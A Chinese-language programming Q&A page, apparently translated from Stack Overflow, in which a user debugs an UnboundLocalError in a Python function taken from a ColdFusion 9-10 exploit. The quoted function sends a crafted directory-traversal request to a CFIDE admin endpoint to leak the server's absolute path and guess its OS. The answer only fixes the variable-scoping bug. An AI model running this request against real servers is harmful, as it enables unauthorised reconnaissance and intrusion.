UnboundLocalError:局部变量' abspath'在分配之前引用

时间:2015-12-27 00:30:23

标签: python-2.7

我尝试重新创建客户网站上使用的漏洞利用程序。 我之前曾与安全分析师交谈,并表示他会在8月8日回顾一下。

以下是我遇到错误的代码部分:

def getpath(protocol,target):
# Leverage a path disclosure to get the absolute path on CF9-10
print "[*] Testing for path disclosure"
abspathdata = requests.get("%s://%s/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/analyzer/index.cfm&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp" % (protocol,target)).headers
if "set-cookie" in abspathdata.keys():
    try:
        abspath = urllib.unquote(abspathdata['set-cookie'].split('ANALYZER_DIRECTORY=')[1].split(';')[0])
        print "[*] Absolute path obtained: %s" % abspath
        if abspath[0] == "/":
            print "[*] Detected Linux"
            operatingsystem = "linux"
        elif abspath[1] == ":":
            print "[*] Detected Windows"
            operatingsystem = "windows 95 with bonzibuddy"
        else:
            print "[?] t4rg3t 4pp34r5 t0 b3 runn1n9 0n 4 r3fr1g3r4t0r"
            operatingsystem = "refrigerator"
    except:
        print "[?] OS detection failure. Continuing with fingerprint."
else:
    print "[?] OS detection failure. Continuing with fingerprint."
return abspath,operatingsystem


abspath,operatingsystem = getpath(protocol,target)
coldfusion = fingerprintcf(protocol,target)

我得到的错误:

Traceback (most recent call last):
  File "C:\Python27\Scripts\cf.py", line 110, in <module>
    abspath,operatingsystem = getpath(protocol,target)
  File "C:\Python27\Scripts\cf.py", line 78, in getpath
    return abspath,operatingsystem
UnboundLocalError: local variable 'abspath' referenced before assignment

1 个答案:

答案 0 :(得分:0)

您只是在代码的一个分支中分配abspath变量。如果第一个条件("set-cookie" in abspathdata.keys())为假(或者urllib.unqote表达式中的某些内容引发异常),则永远不会给变量赋值。当您尝试返回它时,您将获得您描述的异常。

我不能很好地理解你的代码,以便在这种错误情况下建议你应该返回什么,但可能它应该是某种东西。下面是一个如何修复代码的示例(返回一个无意义的路径):

if "set-cookie" in abspathdata.keys():
    try:
        abspath = urllib.unquote(abspathdata['set-cookie'].split('ANALYZER_DIRECTORY=')[1].split(';')[0])
        # I'll skip lots of stuff here
    except:
        print "[?] OS detection failure. Continuing with fingerprint."
        abspath = "invalid!" # don't forget this case either!
else:
    print "[?] OS detection failure. Continuing with fingerprint."
    abspath = "invalid!"
return abspath,operatingsystem

请注意,提出异常可能比返回废话更合适。

相关问题
最新问题